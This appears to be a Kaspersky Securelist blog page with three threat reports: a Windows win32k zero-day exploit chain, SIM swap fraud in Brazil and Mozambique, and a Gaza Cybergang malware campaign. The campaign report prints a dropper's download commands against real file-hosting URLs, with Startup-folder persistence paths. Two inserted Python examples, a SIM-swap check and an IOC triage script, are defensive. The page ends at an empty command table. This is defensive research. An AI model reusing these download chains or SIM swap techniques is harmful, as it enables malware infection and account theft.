Kaspersky Securelist


New zero-day vulnerability CVE-2019-0859 in win32k.sys

15 April, 2019 - 12:00

In March 2019, our automatic Exploit Prevention (EP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. It was the fifth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered in recent months using our technologies. The previous ones were:

On March 17, 2019 we reported our discovery to Microsoft; the company confirmed the vulnerability and assigned it CVE-2019-0859. Microsoft has just released a patch as part of its update, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin.

Technical details

CVE-2019-0859 is a Use-After-Free vulnerability present in the CreateWindowEx function. During execution, CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created. By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before the window procedure is called.

In win32k.sys all windows are represented by the tagWND structure, which has an “fnid” field also known as the Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others. We have already written about Function ID related bugs.

During the WM_NCCREATE callback, the Function ID of a window is set to 0, and this allowed us to set extra data for the window from inside our hook. More importantly, we were able to change the address of the window procedure that was executed immediately after our hook. Changing the window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc, and that function sets the Function ID to FNID_MENU because the current message is WM_NCCREATE. But the most important part is that the ability to manipulate the extra data before the Function ID is set to FNID_MENU can force xxxMenuWindowProc to stop initialization of the menu and return FALSE. Because of that, sending the NCCREATE message is considered a failed operation and CreateWindowEx stops execution with a call to FreeWindow. Because our MENU-class window was never actually initialized, this allows us to gain control over the address of the memory block that is freed.

win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After successful exploitation, the exploit executed PowerShell with a Base64-encoded command. The main aim of this command was to download a second-stage script from https://pastebin.com. The second-stage PowerShell script executes the final, third stage, which is also a PowerShell script.

Third stage PowerShell script

The third script is very simple and does the following:

  • Unpacks shellcode
  • Allocates executable memory
  • Copies shellcode to allocated memory
  • Calls CreateThread to execute shellcode

Shellcode from PowerShell script

The main goal of the shellcode is to make a trivial HTTP reverse shell. This helps the attacker gain full control over the victim’s system.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Exploit Prevention for endpoint products;
  2. Advanced Sandboxing and Anti-Malware engine of the Kaspersky Anti Targeted Attack (KATA) platform.

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

Large-scale SIM swap fraud

11 April, 2019 - 12:00


SIM swap fraud is a type of account takeover fraud that generally targets a weakness in two-factor authentication and two-step verification, where the second factor or step is an SMS or a call placed to a mobile telephone. The fraud centers around exploiting a mobile phone operator’s ability to seamlessly port a telephone number to a new SIM. This feature is normally used when a customer has lost or had their phone stolen. Attacks like these are now widespread, with cybercriminals using them not only to steal credentials and capture OTPs (one-time passwords) sent via SMS but also to cause financial damage to victims.

If someone steals your phone number, you’ll face a lot of problems, especially because most of our modern two-factor authentication systems are based on SMSs that can be intercepted using this technique. Criminals can hijack your accounts one by one by having a password reset sent to your phone. They can trick automated systems – like your bank – into thinking they’re you when they call customer service. And worse, they can use your hijacked number to break into your work email and documents. And these attacks are possible because our financial life revolves around mobile apps that we use to send money, pay bills, etc.

Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow users to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. But nowadays these mobile payments are suffering a wave of attacks and people are losing their money – all powered by SIM swap fraud conducted on a major scale.

Like many other countries, Brazil and Mozambique had a high rate of SIM swap fraud. Both countries speak the same language (Portuguese) and were facing the same problem. By using social engineering, bribery, or even a simple phishing attack, fraudsters take control of customers’ phone numbers in order to receive mobile money transactions, or to collect the home banking OTPs to complete a transfer of funds or steal users’ money. In Mozambique this sort of crime was all over the national news, with the media questioning the integrity of the banks and mobile operators, suggesting they may be colluding in the scams. The reputation of the banks and operators was at stake; something urgent needed to be done to protect their customers.

In Brazil the problem was affecting not only average citizens but also politicians, ministers, governors and high-profile businessmen. Online banking customers were also experiencing losses from their accounts. One organized gang alone in Brazil was able to SIM swap 5,000 victims. At Mozambique’s largest bank they had a monthly average of 17.2 cases of SIM swap fraud; the true impact nationwide is difficult to estimate as most banks don’t publicly share statistics. As was the case in Brazil, some of the victims were high-profile businessmen who had up to US$50,000 stolen from their bank accounts.

In Mozambique a nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. This new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was an immediate reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and is considering making it mandatory for all banks.

In this article we’ll detail how very organized cybercrime developed their own ecosystem of fraud and how Mozambique was able to solve the problem of money being stolen in SIM swap fraud schemes, where mobile payments are an essential part of everyday life.

How the cybercriminals do it

The scam begins with a fraudster gathering details about the victim by using phishing emails, by buying information from organized crime groups, via social engineering or by obtaining the information following data leaks. Once the fraudster has obtained the necessary details they will then contact the victim’s mobile telephone provider. The fraudster uses social engineering techniques to convince the telephone company to port the victim’s phone number to the fraudster’s SIM, for example, by impersonating the victim and claiming they have lost their phone. They then ask for the number to be activated on a new SIM card.

After that the victim’s phone loses its connection to the network and the fraudster receives all the SMSs and voice calls intended for the victim. This allows the fraudster to intercept any one-time passwords sent via SMS or telephone calls made to the victim; all the services that rely on an SMS or telephone call authentication can then be used.

We have found that some of the processes used by mobile operators are weak and leave customers open to SIM swap attacks. For example, in some markets in order to validate your identity the operator may ask for some basic information such as full name, date of birth, the amount of the last top-up voucher, the last five numbers called, etc. Fraudsters can find some of this information on social media or by using apps such as TrueCaller to get the caller name based on the number. With a bit of social engineering they also try to guess the voucher amount based on what’s more popular in the local market. And what about the last five calls? One technique used by the fraudsters is to plant a few ‘missed calls’ or to send an SMS to the victim’s number as bait so that they call back.

Sometimes the target is the carrier, and not the customer. This happens when a carrier’s employees working in branches in small cities are sometimes unable to identify a fraudulent or adulterated document, especially branches located in kiosks or shopping malls, allowing a fraudster to activate a new SIM card. Another big problem is insiders, with some cybercriminals recruiting corrupt employees, paying them $10 to $15 per SIM card activated. The worst attacks occur when a fraudster sends a phishing email that aims to steal a carrier’s system credentials. Ironically, most of these systems don’t use two-factor authentication. Sometimes the goal of such emails is to install malware on the carrier’s network – all a fraudster needs is just one credential, even from a small branch from a small city, to give them access to the carrier’s system.

How much does a SIM swap of your number cost? It depends on how easy or hard it is to do. It’s easier with some carriers than others. A SIM swap for a famous celebrity or a politician can cost thousands of dollars. These are the prices stated on Brazilian underground forums, or occasionally on closed Facebook communities:

  • Carrier A: $10
  • Carrier B: $15
  • Carrier C: $20
  • Carrier D: $25
  • Carrier E: $40

The interest in such attacks is so great among cybercriminals that some of them decided to sell it as a service to others. Normally, a criminal can conduct an attack in two or three hours without much effort, because they already have access to the carrier’s system or an insider.

A Portuguese-speaking cybercriminal selling a SIM swap service. They call it ‘recover chip’…

Brazil has a very organized cybercrime scene, and it’s only natural that its actors will export their techniques and tactics to their fellow cybercriminals acting in other countries, especially in other Portuguese-speaking countries (Portugal, Mozambique, and Angola).

Falling victim – me too

The fraudsters fire in all directions; sometimes their attacks are targeted, sometimes they’re not. All a fraudster needs is your number, and it’s very easy to find it by searching through leaked databases, buying that database from data brokers (some of them are legal), or using apps like TrueCaller and other similar apps that offer caller ID and spam blocking, but which also have some privacy issues and a name-based search for subscribers. Sometimes your number can be found by simply doing a Google search.

The first sign that something is not quite right is when you lose your smartphone signal somewhere that normally has a strong signal. In a hotel last year while on a business trip my corporate smartphone suddenly lost its mobile connection, with no data or calls for about 30 minutes. I tried to solve the problem by connecting to any available network (I was using roaming so it wasn’t a problem), but all of them rejected my device:

As a final resort, I tried rebooting the device and connecting it again, with no success. After that I decided to call (using VoIP) the carrier I’m a customer of to find out what was going on. The operator told me someone had reported my number as “lost or stolen” and asked to activate it on another SIM card. This came as no surprise at all, because the number of victims in Brazil reporting the same problem is growing considerably. What was most surprising was the ease with which the employee gave me this information, as though it was nothing critical, suggesting it was a common occurrence for them. I immediately informed the operator about the ownership of the number, confirmed some personal information and the problem was quickly resolved.

Anyone can be a victim.

Brazil: extortion, WhatsApp and fintechs

WhatsApp is the most popular instant messenger in a number of countries where the app is used by Brazilian fraudsters to steal money in an attack known as ‘WhatsApp cloning’. After a SIM swap, the first thing the criminal does is to load WhatsApp and all the victim’s chats and contacts. Then they begin messaging the contacts in the victim’s name, citing an emergency and asking for money. In some cases, they feign a kidnapping situation, asking for an urgent payment – and some of the contacts will send money.

Brazilian TV has reported on several such cases, with one family losing US$3,000. Some of the attacks targeted companies, with executives supposedly contacting their financial departments asking for funds, when in fact it was fraudsters using WhatsApp accounts hijacked in a SIM swap. It’s like a BEC (Business E-mail Compromise) but using your WhatsApp account.

Extortion attacks via WhatsApp start with a SIM swap

The fintech boom in Brazil started with companies offering credit cards and bank accounts with no fees, especially after the successful launch of Nubank in 2013. Since then, similar solutions have emerged, such as Banco Inter, Next, Digio and Neon, most of them tied to a digital account. Most of them still rely on two-factor authentication via SMS. The ease with which a SIM swap can be performed helped fraudsters find new ways of emptying users’ banking accounts. That’s what happened to the customers of popular Brazilian fintech meupag!, according to a report by Gizmodo Brasil.

The fraudsters performed a SIM swap, activating the victim’s number on another SIM card. Then, on a smartphone with the pag! app installed, the fraudsters used the app’s password recovery function and a code was sent via SMS, allowing the bad guys to gain total control of the user’s account in the app. Once this access is obtained the fraudsters performed several illegal payments with the credit card issued in the app in the name of the victim. Some victims reported losses of US$3,300 in fraudulent transactions.

Mozambique: bribery, banks and a solution

Mobile payments are huge in African countries. Traditional banks are not accessible in rural areas where poor farmers would literally have to walk hundreds of kilometers to reach the closest branch. Mobile operators saw this gap and took the opportunity to invest and diversify their business into micro-finance services and reach areas where there is mobile coverage – all that’s required is a basic mobile phone.

Mobile payment systems like M-Pesa have made a huge impact in Africa. In Mozambique approximately US$5 billion per year is transacted through this platform which corresponds to approximately 41% of the country’s GDP, and in more mature and populated markets like Kenya it goes up to US$33 billion or 48% of the total GDP volume.

Most local banks rely on a one-time password (OTP), with many preferring not to use physical or software tokens as this increases the cost and complexity for customers, especially those on low incomes. The banks therefore try to keep it simple, using an SMS as the second factor. This shows that, perhaps without them even realizing it, they share the responsibility of securing their customers’ bank accounts with the mobile operators.

Mobile fraud on the rise

With financial inclusion services prospering in Africa, the flip side is that it opens a world of opportunities to fraudsters. The population’s technological literacy is very low, especially those on lower incomes. Remarkably, many of the fraudsters are prisoners who somehow have access to mobile phones and a lot of spare time on their hands.

Most SIM swap frauds operate in the same way. There are syndicates that identify and collude with employees from the banks and mobile operators. The bank employee is responsible for providing information about an account balance and detailed information about the victim. Armed with this information, the fraudsters conduct a phishing or SMiShing attack to gain access to the victim’s online banking account and its verification codes.

In the second part of the attack, since the banks use SMS for their OTPs, the criminals need to conduct a SIM swap or SIM card hijacking to redirect all the victim’s communications to a new SIM card that’s in their possession. To achieve this, these syndicates rely on some cooperation from mobile operator employees, though the latter can be easily tracked down and detained. This is why the criminals mostly make use of forged documents that are required by the operator for the SIM swap and present them at mobile retail stores as part of a fraudulent request for a new SIM card. The staff at these stores often don’t have sufficient training to detect forged documents, and even if they do, sometimes the documents are authenticated by an official notary who has been bribed.

Since a phone number can only work on one SIM card at a time, the victim’s original SIM card is immediately blocked and, voilà, the fraudster now has control of the victim’s mobile communications.

The solution adopted in Mozambique

A nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. The new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was a drastic reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and now wants to make it mandatory for all banks.

When a SIM card is hijacked there’s a good chance the fraudster will attempt to transfer funds from the bank account within minutes of the SIM swap to prevent the original owner from having enough time to complain to the mobile operator and regain control of the number.

After a subscriber’s number is blocked following a SIM swap, the victim usually thinks there’s a network problem and only when they realize that other people nearby still have a network connection do they decide to contact the call center from another phone or physically go to a retail shop to find out what is going on. There have been cases like Fabio’s above in which the fraudsters know the victim and wait until the target travels to another country so that it’s even harder for the person to go to a retail store and regain control of the mobile number. If the user has not turned on roaming, they typically only regain control of their numbers within one or two days.

How the solution works

All mobile operators in Mozambique made a platform available to the banks on a private API that flags up if there was a SIM swap involving a specific mobile number associated with a bank account over a predefined period. The bank then decides what to do next.

Most banks block any transaction from a mobile number that has undergone a SIM card change within the last 48 hours, while others opt for the longer period of 72 hours. This period of 48-72 hours is considered a safe period during which the subscriber will contact their operator if they have fallen victim to an unauthorized SIM card change.

There’s also the possibility that the mobile owner has legitimately changed their SIM card and is therefore unable to perform an online transaction for the next 48 hours. In such cases, some of the banks we spoke to have a process that requires face-to-face verification in a branch office – a reasonable compromise in the circumstances.

Platform workflow
  1. The banks are connected to different mobile operators through a VPN connection so that all traffic is secure.
  2. The online banking system conducts a REST API query to the respective mobile operator giving the mobile number (MSISDN) and the period (24-72 hours) as arguments.
  3. The mobile operator simply returns in real time: True or False.
  4. If the query is False, the bank allows the transaction as normal. If True, the bank blocks the transaction and may request additional steps to verify the transaction.
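The bank-side half of the workflow above, written as an added example (not code from the article or from any Mozambican bank or operator). The operator's REST endpoint is modelled by a constructed in-memory stand-in that answers only True/False for an MSISDN and a 24-72 hour look-back, and the subscriber records and numbers are placeholders; the example also shows the 48 h versus 72 h policies and a fail-closed decision when the operator cannot answer.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Callable, Dict

# Look-back range the operators' API accepts, per the workflow above.
MIN_PERIOD_H, MAX_PERIOD_H = 24, 72

# Signature of the operator query: (msisdn, period_hours, now) -> swapped?
SwapQuery = Callable[[str, int, datetime], bool]


@dataclass(frozen=True)
class Decision:
    allow: bool
    reason: str


class ConstructedOperatorApi:
    """Stand-in for one operator's private endpoint (constructed for this example).

    It stores only the time of the last SIM change per MSISDN and answers a
    yes/no question, so no other subscriber data crosses over to the bank.
    """

    def __init__(self, last_sim_change: Dict[str, datetime]) -> None:
        self._last = dict(last_sim_change)

    def sim_swapped_within(self, msisdn: str, period_hours: int, now: datetime) -> bool:
        if not MIN_PERIOD_H <= period_hours <= MAX_PERIOD_H:
            raise ValueError(f"period must be {MIN_PERIOD_H}-{MAX_PERIOD_H} hours")
        changed = self._last.get(msisdn)
        return changed is not None and now - changed <= timedelta(hours=period_hours)


def check_transaction(query: SwapQuery, msisdn: str, now: datetime,
                      period_hours: int = 48) -> Decision:
    """Bank-side decision for a transaction tied to the given mobile number."""
    try:
        swapped = query(msisdn, period_hours, now)
    except Exception as exc:  # network error, bad period, operator outage
        # Fail closed: with no answer, the SMS OTP channel cannot be trusted.
        return Decision(False, f"operator query failed ({exc}); verify the customer another way")
    if swapped:
        return Decision(False, f"SIM changed within the last {period_hours} h; "
                               "block and require face-to-face verification")
    return Decision(True, "no recent SIM change; allow as normal")


# Constructed subscriber records; the numbers are placeholders, not real MSISDNs.
NOW = datetime(2019, 4, 11, 12, 0, tzinfo=timezone.utc)
OPERATOR = ConstructedOperatorApi({
    "258840000001": NOW - timedelta(minutes=5),  # swapped minutes ago: the typical fraud window
    "258840000002": NOW - timedelta(hours=60),   # swapped 2.5 days ago
    # "258840000003" has no recorded SIM change
})


def run_demo() -> Dict[str, bool]:
    """Run the checks a bank would make under a 48 h and a 72 h policy."""
    results: Dict[str, bool] = {}
    for msisdn in ("258840000001", "258840000002", "258840000003"):
        for period in (48, 72):
            d = check_transaction(OPERATOR.sim_swapped_within, msisdn, NOW, period)
            results[f"{msisdn}@{period}h"] = d.allow
            print(f"{msisdn} period={period}h -> allow={d.allow}: {d.reason}")
    return results


if __name__ == "__main__":
    run_demo()
```

The 60-hour-old swap is allowed under the 48 h policy but blocked under the 72 h one, which is exactly the trade-off between the two periods the article describes.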

It is important to reiterate that the mobile operator does not share personal identifiable information (PII) with a third party, in this case banks. The national regulator for communications deemed the sharing of non-identifiable information by operators with the banks to be a case of national interest.

Once the platform was implemented, the level of online banking fraud stemming from SIM swap attacks fell dramatically, with almost no cases involving banks that have implemented the anti-SIM swap platform. As a result, we saw an increase of WhatsApp hijacking in Mozambique, similar to what happened in Brazil.

Conclusion: how not to be the next victim

Voice and SMS must be avoided as authentication mechanisms

Mobile operators rely on legacy protocols for communication such as Signaling System No. 7 (SS7), which was initially developed in the 1970s. This protocol has security flaws that allow the interception of SMS messages or voice calls. By today’s standards, phone/SMS is no longer considered a secure method of authentication if you want to protect high-value information such as bank accounts. An attack on Reddit in 2018 was a wake-up call for most companies.

The National Institute of Standards and Technology (NIST) in the USA explicitly deprecated the use of SMS for 2FA in a special publication, stating:

“Verifiers SHOULD consider risk indicators such as device swap, SIM change, number porting, or other abnormal behavior before using the PSTN to deliver an out-of-band authentication secret.” (NIST 800-63B)

Some banks use software tokens that can be bound to a phone’s IMEI number (its unique identifier); however, the difficult process of enrollment and of maintaining changes, for example when the user replaces the phone, deters many financial institutions.

When possible, we recommend users avoid two-factor authentication via SMS, opting instead for other ways, such as generating an OTP in a mobile app (like Google Authenticator) or using a physical token. Unfortunately, some online services don’t offer an alternative; in that case, the user needs to be aware of the risks.

The new era of biometrics

Some operators have implemented additional security mechanisms that require the user to authenticate through voice biometrics using a passphrase such as “my voice is my password” – the technology works reasonably well, even detecting if the voice is a recording, or if the user has flu. However, the major stumbling block that we observed is the very low enrollment base. Besides, it’s considered an expensive solution, especially for emerging markets, and requires some additional effort to integrate with backend systems.

Automated SMS: “Your number will be deactivated from this SIM card.”

When a SIM change is requested, operators can implement an automated message that’s sent to the number alerting the owner that there’s been a SIM change request and if it’s not authorized, the subscriber must contact the fraud hotline. This will not prevent the hijacking itself, it will instead alert the subscriber so that they can respond faster in the case of malicious activity. The main drawback is that the subscriber may be outside the coverage area.

Some carriers have implemented an additional layer of confirmation for any case of SIM activation, offering the option of configuring a password in their systems. This password will be required for any changes associated with your number, such as big changes in your monthly bill or even when you need a new SIM card. Talk to your carrier to check if they already offer this additional security for your number.

Process improvement

As we mentioned above, some processes contain weaknesses, especially in emerging markets. It’s important to dissect all the stages of the process and understand what the underlying weaknesses are. In the case of Mozambique, there’s a thriving black market that makes it possible to obtain fake documents. These documents can then be presented to operators as proof of identity for SIM swaps.

Activate 2FA on WhatsApp

To avoid WhatsApp hijacking, it’s of paramount importance to activate 2FA using a six-digit PIN on your device. In the event of hijacking, you’ll have another layer of security that is not so easy to bypass.

Request your number be unlisted from TrueCaller and similar apps

TrueCaller is a crowdsourced phone book. It allows people to be identified through their mobile number. However, as we mentioned before, fraudsters use this tool to find out more information about you. You can, and should, request that your number is unlisted from this global phone book.

Despite the fact that attacks on 2FA with the use of tools such as Evilginx are becoming more sophisticated, software tokens still provide a reasonable level of security by today’s standards. Whilst there is no silver bullet solution, we believe that declaring the death of SMS-based 2FA is the way to go. This is especially true when it comes to online banking, social media and email services.

Gaza Cybergang Group1, operation SneakyPastes

10 April, 2019 - 06:30

Gaza Cybergang(s) is a politically motivated Arabic-language cyberthreat actor, actively targeting the MENA (Middle East North Africa) region, especially the Palestinian Territories.

The confusion surrounding Gaza Cybergang’s activities, separation of roles and campaigns has been prevalent in the cyber community. For a while, the gang’s activities seemed scattered, involving different tools and methods, and different malware and infection stages, although there was an alignment in its goals…

During our 2018 monitoring of this group, we were able to identify different techniques utilized by very similar attackers in the MENA region, sometimes on the same target. The findings led to us distinguishing between three attack groups operating within Gaza Cybergang:

  • Gaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;
  • Gaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;
  • Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.

The groups use different styles and, in some cases, techniques, but deploy common tools and commands after initial infection. The three attack groups were identified sharing victims. For example, Group1 would deploy a script to infect a specific victim with malware belonging to Group2, or similarly between Group2 and Group3.

More information on previous Desert Falcons (Group2) and Operation Parliament (Group3) activities can be found below:

Additional findings on Gaza Cybergang Group2 and Group3 will be presented in future publications. For more information, please contact: intelreports@kaspersky.com


Gaza Cybergang Group1, described in this post, is the least sophisticated of the three attack groups and relies heavily on the use of paste sites (with the operation name SneakyPastes) in order to gradually sneak a remote access Trojan (RAT) or multiple, onto victim systems. The group has been seen employing phishing, with several chained stages to evade detection and extend command and control server lifetimes. The most popular targets of SneakyPastes are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.

In this post, we’ll take a closer look at Gaza Cybergang Group1, including:

  1. Updated 2018/2019 tactics, techniques and procedures
  2. Victimology of the group between Jan 2018 and Jan 2019
  3. Historical checkpoints and politicized graphical decoys in Appendix I
  4. Full list of indicators of compromise in Appendix II

Technical analysis

Through our continuous monitoring of threats during 2018, we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel. Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset, which conducts widespread attacks, but is nevertheless focused on Palestinian political problems. The attackers rely a lot on chained attack stages to evade quick detection and hide the communication infrastructure.

After an analysis of the samples, and through collaboration efforts with law enforcement agencies, we were able to uncover the full cycle of the intrusions that spread across the majority of the cyber kill chain, including but not limited to the toolset used, TTPs, infrastructure, action on objectives and the victimology. These efforts have led to the takedown of a large portion of the related infrastructure.

In this campaign, Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims. Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server.

We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server.


The threat actor seemed able to spread attacks widely, but only deployed additional tools and data collection functions in specific cases, as though they had a target list or a filter for targeted victims. Phishing emails with political themes were used in the majority of the observed attack emails. These were necessary to lure the intended type of victims – people involved in politics.

In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself.

If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards.

Intrusion life-cycle analysis

The diagram below displays at a high level the steps taken by typical Gaza Cybergang Group1 lure samples. While different samples may use different methods to infect (i.e. invoke PowerShell, VBS, .NET app downloader, etc.), they generally stick to the same scenario of a persistent RAT that steals data and uploads it to the C2 server despite the different hard-coded domains.

Stage 1 sample file: 3amadi_hamas.zip
MD5: e686ffa90b2bfb567547f1c0dad1ae0b
Type: Compressed container
Child file/lure name: محضر اجتماع العمادي مع هنية رئيس حماس امس الاحد .exe (translation: Minutes of Al-Emadi’s meeting with Haniyeh, head of Hamas, yesterday Sunday)
Child file/lure MD5: 92dd0f16e8ae274d83ba1d0d5b2e342

This sample ZIP file, which is similar to many other stage 1 downloaders in this campaign, contains an executable that is a compiled AutoIt script embedding the functions listed below. The executable attempts to download several files from different sources, saves them in the AppData and Startup folders for persistence, and then invokes the first downloaded file, Picture2.exe, with a hidden window.

Embedded functions, in execution order, with the MD5 of each downloaded file:

  • Sleep, 15000
  • UrlDownloadToFile, https://upload.cat/0037e96c45ac2098?download_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac, %AppData%\Microsoft\Windows\Picture2.exe (MD5: 6240c31d9a82dc70a38f78d44a1ee239)
  • Sleep, 4000
  • UrlDownloadToFile, https://upload.cat/089590f6d72aeaef?download_token=dd21809321669aa2229b20b57e2c9d34a3b507b5df7406bcac5dbb87cd169b78, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\Picture4.exe (MD5: cab62bb5f00fe15683c6af760c8e8f7e)
  • Sleep, 4000
  • UrlDownloadToFile, https://dev-point.co/uploads1/4ee1d5a5b0e41.jpg, %AppData%\Thr0om.jpg (MD5: c90f9c600169cbedbeb23316ea61e214)
  • Sleep, 4000
  • UrlDownloadToFile, https://upload.cat/ec9d388339b19e1c?download_token=131d5450c192d0591f3d06841eacc5bf5f344be9725be9456e2c222d0b4831e2, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\333Po333.exe (MD5: 8c5f8d1ab7baa9a0764cd5650ddecd8e)
  • Sleep, 5000
  • UrlDownloadToFile, https://upload.cat/9a08bc13e683d330?download_token=90f1ebb4e1f52835f502bea4307686afc1eb1cdee973cef1fb043febb2a92078, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsFrom444444.exe (MD5: 2a3aa1d207030d8c7dc3cfc9c2d9f9f1)
  • Sleep, 5000
  • UrlDownloadToFile, https://upload.cat/a1c05c819dadeefb?download_token=c6535b11a9f9bbf9e7681be8753f2058bac0df5264744be76605244e96a388f5, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsFrom355353.exe (MD5: bd83269da75741303a19b826c5f9627d)
  • Sleep, 5000
  • RunWait %AppData%\Microsoft\Windows\Picture2.exe ,, hide
  • Sleep, 2000

After analyzing the files downloaded by this first-stage malware, it was clear that the threat actor wanted to achieve stable persistence on the victim machine and used more than one technique to exfiltrate data. The analyzed samples had a lot of similarities in the code used, and especially in the persistence techniques.
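The call list above is what an analyst gets back from a decompiled AutoIt dropper, and the useful next step is to turn it into IOCs and behaviour flags mechanically. The script below is an added example written for this page, not the actor’s script or Kaspersky’s tooling: it parses a constructed dump of the calls (same sequence as above, with the download tokens replaced by placeholders), extracts hosts and drop paths, and flags Startup-folder persistence, payloads saved under a non-executable extension, hidden-window execution and the long sleeps that precede the downloads.

```python
"""Triage of the calls recovered from a compiled AutoIt stage-1 downloader.

Added example for this post; it is neither the actor's script nor Kaspersky's tooling.
Input is a constructed text dump of the recovered calls, one per line, in the shape the
post lists them. TOKEN1/TOKEN2 stand in for the real download tokens.
"""
import re
from urllib.parse import urlsplit

# Per-user Startup folder: anything dropped here runs at every logon.
STARTUP_FRAGMENT = "\\start menu\\programs\\startup\\"
EXEC_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta"}

DL_RE = re.compile(r"^UrlDownloadToFile\s*,\s*([^,\s]+)\s*,\s*(.+?)\s*$", re.I)
SLEEP_RE = re.compile(r"^Sleep\s*,\s*(\d+)\s*$", re.I)
RUN_RE = re.compile(r"^(Run|RunWait|ShellExecute|ShellExecuteWait)\s+(.*)$", re.I)

# Constructed sample: the post's call sequence, tokens replaced by placeholders.
SAMPLE_CALLS = r"""
Sleep, 15000
UrlDownloadToFile, https://upload.cat/0037e96c45ac2098?download_token=TOKEN1, %AppData%\Microsoft\Windows\Picture2.exe
sleep,4000
UrlDownloadToFile, https://upload.cat/089590f6d72aeaef?download_token=TOKEN2, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\Picture4.exe
sleep,4000
UrlDownloadToFile, https://dev-point.co/uploads1/4ee1d5a5b0e41.jpg, %AppData%\Thr0om.jpg
sleep,5000
RunWait %AppData%\Microsoft\Windows\Picture2.exe ,, hide
sleep,2000
"""


def triage_autoit_calls(text):
    """Turn the recovered call list into a small IOC/behaviour report."""
    report = {"downloads": [], "executes": [], "domains": set(),
              "total_sleep_ms": 0, "findings": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := SLEEP_RE.match(line):
            report["total_sleep_ms"] += int(m.group(1))
            continue
        if m := DL_RE.match(line):
            url, dest = m.groups()
            host = (urlsplit(url).hostname or "").lower()
            ext = ("." + dest.rsplit(".", 1)[1].lower()) if "." in dest else ""
            entry = {"url": url, "host": host, "dest": dest,
                     "persistence": STARTUP_FRAGMENT in dest.lower(),
                     "executable": ext in EXEC_EXTS}
            report["downloads"].append(entry)
            report["domains"].add(host)
            if entry["persistence"]:
                report["findings"].append(f"Startup-folder persistence: {dest}")
            if not entry["executable"]:
                report["findings"].append(
                    f"Non-executable extension dropped under AppData, confirm type from magic bytes: {dest}")
            continue
        if m := RUN_RE.match(line):
            verb, rest = m.groups()
            target, _, flags = rest.partition(",,")   # AutoIt: Run(path, workdir, show_flag)
            entry = {"verb": verb, "target": target.strip(), "hidden": "hide" in flags.lower()}
            report["executes"].append(entry)
            if entry["hidden"]:
                report["findings"].append(f"Hidden-window execution: {entry['target']}")
    # Long sleeps before and between network stages are a common sandbox-evasion tell.
    if report["total_sleep_ms"] >= 10_000:
        report["findings"].append(f"Sleeps total {report['total_sleep_ms']} ms across the stages")
    return report


if __name__ == "__main__":
    result = triage_autoit_calls(SAMPLE_CALLS)
    print("Hosts to block:", sorted(result["domains"]))
    for finding in result["findings"]:
        print("-", finding)
```

The drop paths and hosts are what go into blocking rules; the findings list is the behavioural summary a sandbox report would usually give you, recovered here statically. Note that a `.jpg` under AppData is only suspicious once the magic bytes are checked; the script flags it for that check rather than calling it malicious.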

Malware features

All the stages’ executables are created as chains to avoid detection and protect the C2 server. They consist mainly of persistence mechanisms and simple instructions despite their different forms (VBS scripts, PowerShell scripts, known software with open source code that can be backdoored, and in-house built dotnet apps). The RAT, however, has a multitude of functions (listed in the table below) such as download and execute, compress, encrypt, upload, search directories, etc. The threat actor’s main objective in using this RAT (known as Razy/NeD worm/Wonder Botnet) was obvious from the victim data that was collected: it searches for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, compresses the matches into RAR files per category, stores them in temp directories within a folder named by victim ID (bot ID, a long MD5 string), and then encrypts and uploads them to the C2.

Command and brief description:

